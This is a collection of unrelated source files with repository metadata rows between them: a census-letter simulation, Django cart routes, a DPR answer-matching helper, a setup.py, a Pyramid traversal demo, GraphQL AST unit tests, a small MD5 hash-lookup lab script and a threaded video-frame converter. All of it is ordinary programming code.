self.input_data = input_data
self.type = ad_type
# date range in datetime format
self.start_date = datetime.datetime.strptime(self.input_data['start_date'], '%Y, %m, %d').date()
self.end_date = datetime.datetime.strptime(self.input_data['end_date'], '%Y, %m, %d').date()
# date range in simpy format
self.start_sim_time = h.get_entity_time(self, "start") # the sim time the adviser starts work
self.end_sim_time = h.get_entity_time(self, "end") # the sim time the adviser ends work
# time range - varies by day of week
self.set_avail_sch = input_data['availability']
class LetterPhase(object):
def __init__(self, env, rep, district, input_data, letter_type):
self.env = env
self.rep = rep
self.district = district
self.input_data = input_data
self.letter_type = letter_type
self.blanket = h.str2bool(self.input_data["blanket"])
self.targets = self.input_data["targets"]
self.start_sim_time = h.get_event_time(self)
self.period = self.input_data["period"]
# add process to decide who to send letters too...but with a delay
start_delayed(self.env, self.fu_letter(), self.start_sim_time)
def fu_letter(self):
temp_letter_list = [household for household in self.district.households
if (not self.blanket and household.hh_type in self.targets and not household.responded) or \
(self.blanket and household.hh_type in self.targets)]
# order by priority
temp_letter_list.sort(key=lambda hh: hh.priority, reverse=False)
for i in range(self.period):
current_letter_day = temp_letter_list[i::self.period]
for household in current_letter_day:
add_delay = i * 24
if self.letter_type == 'pq':
household.paper_allowed = True
if oo.record_paper_summary:
# add to the summary of the amount of paper given
for key, value in self.rep.paper_summary.items():
value[str(getattr(household, key))][math.floor((self.env.now + add_delay) / 24)] += 1
for key, value in self.rep.paper_totals.items():
value[str(getattr(household, key))] += 1
self.env.process(self.co_send_letter(household, self.letter_type, self.input_data["delay"] + add_delay))
yield self.env.timeout(0)
def co_send_letter(self, household, letter_type, delay):
if oo.record_letters:
self.rep.output_data[letter_type + '_sent'].append(oo.generic_output(self.rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
self.env.now))
yield self.env.timeout(delay)
self.env.process(household.receive_reminder(letter_type))
def schedule_paper_drop(obj, contact_type, reminder_type, delay):
# add to summary of paper given out
if reminder_type == 'pq' and oo.record_paper_summary:
for key, value in obj.rep.paper_summary.items():
value[str(getattr(obj, key))][math.floor(obj.rep.env.now / 24)] += 1
for key, value in obj.rep.paper_totals.items():
value[str(getattr(obj, key))] += 1
output_type = contact_type + "_" + reminder_type + "_posted" # use this as output key
if oo.record_posted:
obj.rep.output_data[output_type].append(oo.generic_output(obj.rep.reps,
obj.district.district,
obj.la,
obj.lsoa,
obj.digital,
obj.hh_type,
obj.hh_id,
obj.env.now))
if delay > 0:
start_delayed(obj.env, obj.receive_reminder(reminder_type), delay)
else:
obj.env.process(obj.receive_reminder(reminder_type))
yield obj.env.timeout(0)
| [
"[email protected]"
] | |
218c3c740337ecd6f019cf07d45326d26a037866 | 2437f5e7f243ccf712f94b08f272b7d5387f90cf | /dailyfresh/apps/cart/urls.py | a7e68618919bfccd6fe10436169f4b05ec0e1449 | [] | no_license | KWTsoftkitty/pyCode | b06b128292a2c64e5552c495087693bdd01042c4 | fffa66737ca9ba29b296245767eea8af3ee769d6 | refs/heads/master | 2020-03-25T20:46:45.163930 | 2019-08-30T08:40:27 | 2019-08-30T08:40:27 | 144,145,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | from django.conf.urls import url
from cart.views import CartInfoView, CartAddView, CartUpdateView, CartDeleteView
urlpatterns = [
url(r'^show$', CartInfoView.as_view(), name='show'), # 购物车页面显示
url(r'^add$', CartAddView.as_view(), name='add'), # 购物车添加
url(r'^update$', CartUpdateView.as_view(), name='update'), # 购物车更新
url(r'^delete$', CartDeleteView.as_view(), name='delete'), # 删除购物车记录
]
| [
"[email protected]"
] | |
c705c0b17acc935c371cb01c2c106b884fe5ba24 | fdbcef18ee57e350619cba7a0aa430f2bc832dcb | /scalingqa/retriever/hit_processing.py | 8611e4252ec2a8e158ff56bb0bcca96c1b8be205 | [
"MIT"
] | permissive | Ankur3107/scalingQA | 5091f14bf14f53fbe198287e34d8c0376e40cdc8 | f648e34a9e4d7d4dbc2549a3c8767b6a25e3c447 | refs/heads/main | 2023-04-17T20:03:40.661471 | 2021-04-22T05:28:30 | 2021-04-22T05:28:30 | 360,213,015 | 0 | 0 | MIT | 2021-04-22T05:28:31 | 2021-04-21T15:08:34 | Python | UTF-8 | Python | false | false | 2,149 | py | import re
from ..common.drqa_tokenizers.simple_tokenizer import SimpleTokenizer
from ..common.utility.metrics import normalize
dpr_tokenizer = None
def process_hit_token_dpr(e, db, match_type="string"):
global dpr_tokenizer
if dpr_tokenizer is None:
dpr_tokenizer = SimpleTokenizer()
def regex_match(text, pattern):
"""Test if a regex pattern is contained within a text."""
try:
pattern = re.compile(
pattern,
flags=re.IGNORECASE + re.UNICODE + re.MULTILINE,
)
except BaseException:
return False
return pattern.search(text) is not None
def has_answer(answers, text, tokenizer, match_type) -> bool:
"""Check if a document contains an answer string.
If `match_type` is string, token matching is done between the text and answer.
If `match_type` is regex, we search the whole text with the regex.
"""
text = normalize(text)
if match_type == 'string':
# Answer is a list of possible strings
text = tokenizer.tokenize(text).words(uncased=True)
for single_answer in answers:
single_answer = normalize(single_answer)
single_answer = tokenizer.tokenize(single_answer)
single_answer = single_answer.words(uncased=True)
for i in range(0, len(text) - len(single_answer) + 1):
if single_answer == text[i: i + len(single_answer)]:
return True
elif match_type == 'regex':
# Answer is a regex
for single_answer in answers:
single_answer = normalize(single_answer)
if regex_match(text, single_answer):
return True
return False
top, answers, raw_question = e
if type(top) != list:
top = top.tolist()
for rank, t in enumerate(top):
text = db.get_doc_text(t)[0]
if has_answer(answers, text, dpr_tokenizer, match_type):
return {"hit": True, "hit_rank": rank}
return {"hit": False, "hit_rank": -1}
| [
"[email protected]"
] | |
ee0ea350d13c32438c662a8a258423d9b8287956 | 20c4a239e000b15131251d372ccad9110063a961 | /setup.py | 91ea45b7093ebde7a34cf7d5eb933f7529893fdf | [
"MIT"
] | permissive | Partidani/hdlConvertor | 9d0e382e6e087ac240502538b63f8667004a7715 | 36d3b58e2641e39c323ed9ee337135e49c64d076 | refs/heads/master | 2023-04-06T00:03:31.505727 | 2021-04-19T07:28:25 | 2021-04-19T07:28:25 | 366,418,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,810 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
from setuptools import find_packages
try:
from skbuild import setup
except ImportError:
raise ImportError("Missing scikit-build, (should be automatically installed by pip)")
import sys
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, "README.md")) as f:
long_description = f.read()
deps = ["typing", "future"] if sys.version_info[0] == 2 else []
setup(
cmake_args=[
# '-DCMAKE_BUILD_TYPE=Debug'
],
name='hdlConvertor',
version='2.2',
description='VHDL and System Verilog parser written in c++',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Nic30/hdlConvertor',
author='Michal Orsak',
author_email='[email protected]',
keywords=['hdl', 'vhdl', 'verilog', 'system verilog',
'parser', 'preprocessor', 'antlr4'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Topic :: Software Development :: Build Tools',
'Programming Language :: C++',
'Programming Language :: Cython',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',
],
install_requires=[
'hdlConvertorAst>=0.7',
] + deps,
license="MIT",
packages=find_packages(exclude=["tests", ]),
test_suite="tests.main_test_suite",
test_runner="tests:TimeLoggingTestRunner",
tests_require=deps,
)
| [
"[email protected]"
] | |
1f1e7a0b4abdeaaf41b0249eee3816924a031f17 | d732fb0d57ec5430d7b15fd45074c555c268e32c | /misc/traversal_basics/trav10.py | a31652b349cd80bc1656caffb5760ac4bffff3db | [] | no_license | askobeldin/mypython3 | 601864997bbebdabb10809befd451490ffd37625 | 8edf58311a787f9a87330409d9734370958607f1 | refs/heads/master | 2020-04-12T08:01:16.893234 | 2018-02-01T18:23:23 | 2018-02-01T18:23:23 | 60,504,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,373 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
################################################################################
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from string import Template
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.location import lineage
"""
from pyramid.httpexceptions import HTTPFound
#################################
# make a new Document
#
title = appstruct['title']
body = appstruct['body']
name = str(randint(0, 999999))
new_document = Document(name, self.context, title, body)
self.context[name] = new_document
######################################
# Redirect to the new document
#
url = self.request.resource_url(new_document)
return HTTPFound(location=url)
"""
class Folder(OrderedDict):
def __init__(self, name, parent, title):
super(Folder, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
class Document(object):
def __init__(self, name, parent, title, body):
self.__name__ = name
self.__parent__ = parent
self.title = title
self.body = body
class SiteFolder(Folder):
pass
class Collector(Folder):
def __init__(self, *args, **kwds):
super(Collector, self).__init__(*args, **kwds)
self.toysList = []
class Toy(object):
__slots__ = ('__name__', '__parent__',
'title', 'description', 'tag')
def __init__(self, data, parent):
self.__name__ = data['title']
self.__parent__ = parent
self.title = data['title']
self.description = data['description']
self.tag = data['tag']
class SimpleDB(OrderedDict):
def __init__(self, name, parent, title):
super(SimpleDB, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
def __getitem__(self, key):
print 'need key = %s' % key
try:
item = super(SimpleDB, self).__getitem__(key)
except KeyError:
print 'Key %s error!' % (key,)
print 'Generating new Bear toy with key %s' % (key,)
newtoy = {'title': u'Generated Bear %s' % (key,),
'description': u'Generated description for Bear %s' % (key,),
'tag': u'bears'}
item = Toy(data = newtoy,
parent = switchcollector[newtoy['tag']])
# save generated toy
self[key] = item
# update collector for Bears
collector1.toysList.insert(0, key)
return item
def __setitem__(self, key, value):
print 'saving %s to key %s' % (value, key)
super(SimpleDB, self).__setitem__(key, value)
def get_root(request):
return RTREE
def view_site(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Site folder</title>
</head>
<body>
<h3>title: $title</h3>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_folder(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Folder $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_collector(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Collector $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<h3>Toys:</h3>
$toys
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
toys = getToysTableLinks(context, request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_doc(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Document $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<p>body: $body</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
body = context.body)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_db(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Database $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_toy(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Toy $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>Title: $title</h3>
<h3>Tag: $tag</h3>
<h3>Description:</h3>
<p>$descr</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
descr = context.description,
tag = context.tag)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def getBreadCrumbs(request):
cr = [(request.resource_url(i), i.title) for i in lineage(request.context)]
cr.reverse()
li = ['<li>' + '<a href="' + i[0] + '">' + i[1] + '</a></li>'
for i in cr[:-1]]
#last item of breadcrumbs
li.append('<li>' + cr[-1][1] + '</li>')
return "<ul>" + "\n".join(li) + "</ul>"
def getFolderLeaves(request):
leaves = request.context.items()
li = ['<li>' + '<a href="' + request.resource_url(i[1]) + '">' + i[0] +
'</a></li>' for i in leaves]
return "<ul>" + "\n".join(li) + "</ul>"
def getToysList(collector):
if collector.toysList:
return collector.toysList
else:
return []
def getToysTable(collector):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td>%s</td>" % i)
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def getToysTableLinks(collector, request):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td><a href=\"/db/%s\">%s</a></td>" % (i, i))
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def fillCollector(collector, tag, db):
lst = []
data = db.items()
for (k, v) in data:
if v['tag'] == tag:
lst.append(k)
collector.toysList.extend(lst)
def printinfo(context, request):
# print request.__dict__
formatstring ='%-36s%s'
print formatstring % ('request.url', request.url)
print formatstring % ('request.host', request.host)
print formatstring % ('request.host_url', request.host_url)
print formatstring % ('request.application_url', request.application_url)
print formatstring % ('request.path_url', request.path_url)
print formatstring % ('request.path', request.path)
print formatstring % ('request.path_qs', request.path_qs)
print formatstring % ('request.query_string', request.query_string)
print 10 * '-'
# print formatstring % ('request.matchdict', request.matchdict)
### need a name attribute
# print formatstring % ('request.resource_url(context)', request.resource_url(context))
print formatstring % ('request.cookies', request.cookies)
print formatstring % ('request.headers', request.headers)
# print formatstring % ('request.json', request.json)
print formatstring % ('request.method', request.method)
print formatstring % ('request.charset', request.charset)
if request.params:
print formatstring % ('request.params', request.params)
print formatstring % ('request.params.keys()', request.params.keys())
print formatstring % ('request.params.items()', request.params.items())
# ошибка если передано несколько параметров age
# print formatstring % ('request.params.getone(\'age\')', request.params.getone('age'))
print formatstring % ('request.params.getall(\'age\')', request.params.getall('age'))
print 60 * '='
print 'context info'
print
for i in context:
print i, context[i]
print 60 * '='
print 'URL parameters'
################
# resources tree
#
RTREE = SiteFolder('', None, u'Site folder')
folder1 = Folder(u'f1', RTREE, u'Folder one')
RTREE[u'f1'] = folder1
folder2 = RTREE[u'f2'] = Folder(u'f2', RTREE, u'Folder two')
folder3 = RTREE[u'f3'] = Folder(u'f3', RTREE, u'Folder три')
folder4 = folder3[u'f4'] = Folder(u'f4', folder3, u'Folder #4')
d1 = Document(name=u'd1',
parent=folder1,
title=u'Testing document 1',
body=u'Body of testing document 1')
folder1[u'd1'] = d1
# main toys collector
collector = RTREE[u'toys'] = Folder(u'toys', RTREE, u'Toys')
collector1 = collector[u'bears'] = Collector(u'bears', collector, u'Bears')
collector2 = collector[u'dolls'] = Collector(u'dolls', collector, u'Dolls')
collector3 = collector[u'angels'] = Collector(u'angels', collector, u'Angels')
collector4 = collector[u'test'] = Collector(u'test', collector, u'Testing')
simpledb = RTREE[u'db'] = SimpleDB(u'db', RTREE, u'SimpleDB')
PSEUDO_DB = {
1: {'title': u'Bear 1', 'description': u'Description of Bear 1', 'tag': u'bears'},
2: {'title': u'Doll 2', 'description': u'Description of Doll 2', 'tag': u'dolls'},
3: {'title': u'Doll 3', 'description': u'Description of Doll 3', 'tag': u'dolls'},
4: {'title': u'Bear 4', 'description': u'Description of Bear 4', 'tag': u'bears'},
5: {'title': u'Doll 5', 'description': u'Description of Doll 5', 'tag': u'dolls'},
6: {'title': u'Angel 6', 'description': u'Description of Angel 6', 'tag': u'angels'},
7: {'title': u'Doll 7', 'description': u'Description of Doll 7', 'tag': u'dolls'},
8: {'title': u'Doll 8', 'description': u'Description of Doll 8', 'tag': u'dolls'},
9: {'title': u'Bear 9', 'description': u'Description of Bear 9', 'tag': u'bears'},
10: {'title': u'Angel 10', 'description': u'Description of Angel 10', 'tag': u'angels'},
11: {'title': u'Angel 11', 'description': u'Description of Angel 11', 'tag': u'angels'},
12: {'title': u'Angel 12', 'description': u'Description of Angel 12', 'tag': u'angels'},
13: {'title': u'Angel 13', 'description': u'Description of Angel 13', 'tag': u'angels'},
14: {'title': u'Bear 14', 'description': u'Description of Bear 14', 'tag': u'bears'},
15: {'title': u'Bear 15', 'description': u'Description of Bear 15', 'tag': u'bears'},
16: {'title': u'Angel 16', 'description': u'Description of Angel 16', 'tag': u'angels'},
17: {'title': u'Test 17', 'description': u'Description of Test 17', 'tag': u'test'},
18: {'title': u'Test 18', 'description': u'Description of Test 18', 'tag': u'test'},
19: {'title': u'Doll 19', 'description': u'Description of Doll 19', 'tag': u'dolls'},
20: {'title': u'Test 20', 'description': u'Description of Test 20', 'tag': u'test'},
21: {'title': u'Angel 21', 'description': u'Description of Angel 21', 'tag': u'angels'},
22: {'title': u'Bear 22', 'description': u'Description of Bear 22', 'tag': u'bears'},
23: {'title': u'Test 23', 'description': u'Description of Test 23', 'tag': u'test'},
24: {'title': u'Doll 24', 'description': u'Description of Doll 24', 'tag': u'dolls'},
25: {'title': u'Doll 25', 'description': u'Description of Doll 25', 'tag': u'dolls'},
26: {'title': u'Test 26', 'description': u'Description of Test 26', 'tag': u'test'},
27: {'title': u'Bear 27', 'description': u'Description of Bear 27', 'tag': u'bears'},
28: {'title': u'Test 28', 'description': u'Description of Test 28', 'tag': u'test'},
29: {'title': u'Angel 29', 'description': u'Description of Angel 29', 'tag': u'angels'},
30: {'title': u'Test 30', 'description': u'Description of Test 30', 'tag': u'test'},
31: {'title': u'Doll 31', 'description': u'Description of Doll 31', 'tag': u'dolls'},
}
###########################################################################
if __name__ == '__main__':
config = Configurator(root_factory=get_root)
config.add_view(view=view_site,
context=SiteFolder)
config.add_view(view=view_folder,
context=Folder)
config.add_view(view=view_collector,
context=Collector)
config.add_view(view=view_doc,
context=Document)
config.add_view(view=view_db,
context=SimpleDB)
config.add_view(view=view_toy,
context=Toy)
# filling collectors of toys
fillCollector(collector1, u'bears', PSEUDO_DB)
fillCollector(collector2, u'dolls', PSEUDO_DB)
fillCollector(collector3, u'angels', PSEUDO_DB)
fillCollector(collector4, u'test', PSEUDO_DB)
########################################
# initialize database
switchcollector = {u'bears': collector1,
u'dolls': collector2,
u'angels': collector3,
u'test': collector4}
for (k, v) in PSEUDO_DB.items():
simpledb[str(k)] = Toy(data = v,
parent = switchcollector[v['tag']])
app = config.make_wsgi_app()
server = make_server('0.0.0.0', 8080, app)
server.serve_forever()
| [
"[email protected]"
] | |
12431f449479c4225d285315b7a3bb921570c910 | efcd21234f3291e8fc561f49a7c88fc57a63e952 | /tests/unit/language/ast/test_directive_definition.py | b356575d34de9eab8e68c11d4445ef82a42fc23c | [
"MIT"
] | permissive | tartiflette/tartiflette | 146214a43847d2f423bf74594643c1fdefc746f1 | 421c1e937f553d6a5bf2f30154022c0d77053cfb | refs/heads/master | 2023-09-01T02:40:05.974025 | 2022-01-20T14:55:31 | 2022-01-20T14:55:31 | 119,035,565 | 586 | 39 | MIT | 2023-09-11T07:49:27 | 2018-01-26T09:56:10 | Python | UTF-8 | Python | false | false | 6,673 | py | import pytest
from tartiflette.language.ast import DirectiveDefinitionNode
def test_directivedefinitionnode__init__():
directive_definition_node = DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
)
assert directive_definition_node.name == "directiveDefinitionName"
assert (
directive_definition_node.locations == "directiveDefinitionLocations"
)
assert (
directive_definition_node.description
== "directiveDefinitionDescription"
)
assert (
directive_definition_node.arguments == "directiveDefinitionArguments"
)
assert directive_definition_node.location == "directiveDefinitionLocation"
@pytest.mark.parametrize(
"directive_definition_node,other,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
Ellipsis,
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionNameBis",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocationsBis",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescriptionBis",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArgumentsBis",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocationBis",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
True,
),
],
)
def test_directivedefinitionnode__eq__(
directive_definition_node, other, expected
):
assert (directive_definition_node == other) is expected
@pytest.mark.parametrize(
"directive_definition_node,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
"DirectiveDefinitionNode("
"description='directiveDefinitionDescription', "
"name='directiveDefinitionName', "
"arguments='directiveDefinitionArguments', "
"locations='directiveDefinitionLocations', "
"location='directiveDefinitionLocation')",
)
],
)
def test_directivedefinitionnode__repr__(directive_definition_node, expected):
assert directive_definition_node.__repr__() == expected
| [
"[email protected]"
] | |
0d98db9ec83456db136f54a759d5de5a9a1ccb42 | c42b08296e47e113ea66d8d14b383abccfbce409 | /myhashtry.py | 877c1cafe1784c183cfe3f85b83929bd081b06e3 | [] | no_license | unmutilated/code | 49750a92ec855158740f456b3b1d3dd34890ca88 | 8961e5cf394aecdf71d70cc6b2ff03f35de14db5 | refs/heads/master | 2022-05-24T13:14:37.318698 | 2020-04-27T20:11:08 | 2020-04-27T20:11:08 | 259,436,704 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,308 | py | import sys
import hashlib
Output = []
def ReadFile():
file0 = open("CRY_Lab_02_B_hashes.txt", "r")
lines = f.readlines()
file0.close()
s = set()
for data in lines:
s.add(data.strip())
print("Read in {0} lines from the MD5 hash file".format(len(lines)))
return s
def SaveFile():
file1 = open("Output.txt","w")
file1.writelines(Output)
file1.close
def HashFind():
hashset = ReadFile()
alph = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@"
count = 0
for element in range(0, len(alph)):
m = alph[element]
print(element) #for debuggig
print(len(alph)) #for debugging
h = hashlib.md5(m.encode()).hexdigest()
if h in hashset:
Output.append("{0} Found a hash: {1} hashes to {2}\n".format(count, m, h))
count = count +1
if count >= 1000:
print("All Done")
SaveFile()
sys.exit()
else:
sys.exit()
if __name__ == "__main__":
while True:
userchoice = input("to hash press h [Enter to quit]: ").upper()
if userchoice.startswith("H"):
HashFind()
else:
sys.exit()
| [
"[email protected]"
] | |
8489d3ddbd733e3678c75d8fcdde182f1b735194 | 60fd4409e031a18bbd65e37d2f7d4d05dcb65caa | /Python/代码实现/day02-多线程进程/13-多线程共享全局变量.py | f28f64bf29e1650b3a00ab9cb41fda8ebe34f421 | [] | no_license | YaoFANGUK/Practice-Code | 1e05310773f9d19f54c2d0197cd613c75defc38c | 01ee0c3f24d505c4fab5b82c52b545933871b950 | refs/heads/master | 2021-06-19T17:02:16.814441 | 2021-06-04T03:38:39 | 2021-06-04T03:38:39 | 222,544,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | # join: 主线程等待add_thread执行完成,再继续向下执行
# 结论:线程之间可以共享全局变量
| [
"[email protected]"
] | |
3273285dc5118a47952c40dfdd26e29bd612aa47 | 46f03a8353b3fd0cd1ca35e0d322c4a53649596b | /try.py | 193887977e7feaeaa8f466637561399d7a348948 | [] | no_license | dragikamov/Video_Converter | d7d73a948853c99840606b89fc79dbcf8e1bde97 | e0233f9c190618e30bb85bcfa9df881f0eee058e | refs/heads/master | 2020-04-30T15:50:35.037923 | 2019-03-30T22:35:29 | 2019-03-30T22:35:29 | 176,931,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,925 | py | import cv2
import numpy as np
import os
from canny_edge import *
import threading
from os.path import isfile, join
# Function for converting an image to grayscale
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
# Export of video
def exportVid():
frame_array = []
files = [f for f in os.listdir('data/') if isfile(join('data/', f))]
files.sort(key = lambda x: int(x[5:-4]))
for i in range(len(files)):
filename = 'data/' + files[i]
img = cv2.imread(filename)
height, width, _ = img.shape
size = (width,height)
print(filename)
frame_array.append(img)
fourcc = cv2.VideoWriter_fourcc(*'DIVX')
out = cv2.VideoWriter('export.avi', fourcc, 24.0, (width,height))
for i in range(len(frame_array)):
out.write(frame_array[i])
out.release()
def thread(i, imgs):
t1 = threading.Thread(target=detect, args=(imgs[0], i + 1))
t2 = threading.Thread(target=detect, args=(imgs[1], i + 2))
t3 = threading.Thread(target=detect, args=(imgs[2], i + 3))
t4 = threading.Thread(target=detect, args=(imgs[3], i + 4))
t5 = threading.Thread(target=detect, args=(imgs[4], i + 5))
t6 = threading.Thread(target=detect, args=(imgs[5], i + 6))
t7 = threading.Thread(target=detect, args=(imgs[6], i + 7))
t8 = threading.Thread(target=detect, args=(imgs[7], i + 8))
t9 = threading.Thread(target=detect, args=(imgs[8], i + 9))
t10 = threading.Thread(target=detect, args=(imgs[9], i + 10))
t11 = threading.Thread(target=detect, args=(imgs[10], i + 11))
t12 = threading.Thread(target=detect, args=(imgs[11], i + 12))
t13 = threading.Thread(target=detect, args=(imgs[12], i + 13))
t14 = threading.Thread(target=detect, args=(imgs[13], i + 14))
t15 = threading.Thread(target=detect, args=(imgs[14], i + 15))
t16 = threading.Thread(target=detect, args=(imgs[15], i + 16))
t17 = threading.Thread(target=detect, args=(imgs[16], i + 17))
t18 = threading.Thread(target=detect, args=(imgs[17], i + 18))
t19 = threading.Thread(target=detect, args=(imgs[18], i + 19))
t20 = threading.Thread(target=detect, args=(imgs[19], i + 20))
t21 = threading.Thread(target=detect, args=(imgs[20], i + 21))
t22 = threading.Thread(target=detect, args=(imgs[21], i + 22))
t23 = threading.Thread(target=detect, args=(imgs[22], i + 23))
t24 = threading.Thread(target=detect, args=(imgs[23], i + 24))
t25 = threading.Thread(target=detect, args=(imgs[24], i + 25))
t26 = threading.Thread(target=detect, args=(imgs[25], i + 26))
t27 = threading.Thread(target=detect, args=(imgs[26], i + 27))
t28 = threading.Thread(target=detect, args=(imgs[27], i + 28))
t29 = threading.Thread(target=detect, args=(imgs[28], i + 29))
t30 = threading.Thread(target=detect, args=(imgs[29], i + 30))
t31 = threading.Thread(target=detect, args=(imgs[30], i + 31))
t32 = threading.Thread(target=detect, args=(imgs[31], i + 32))
t33 = threading.Thread(target=detect, args=(imgs[32], i + 33))
t34 = threading.Thread(target=detect, args=(imgs[33], i + 34))
t35 = threading.Thread(target=detect, args=(imgs[34], i + 35))
t36 = threading.Thread(target=detect, args=(imgs[35], i + 36))
t37 = threading.Thread(target=detect, args=(imgs[36], i + 37))
t38 = threading.Thread(target=detect, args=(imgs[37], i + 38))
t39 = threading.Thread(target=detect, args=(imgs[38], i + 39))
t40 = threading.Thread(target=detect, args=(imgs[39], i + 40))
t41 = threading.Thread(target=detect, args=(imgs[40], i + 41))
t42 = threading.Thread(target=detect, args=(imgs[41], i + 42))
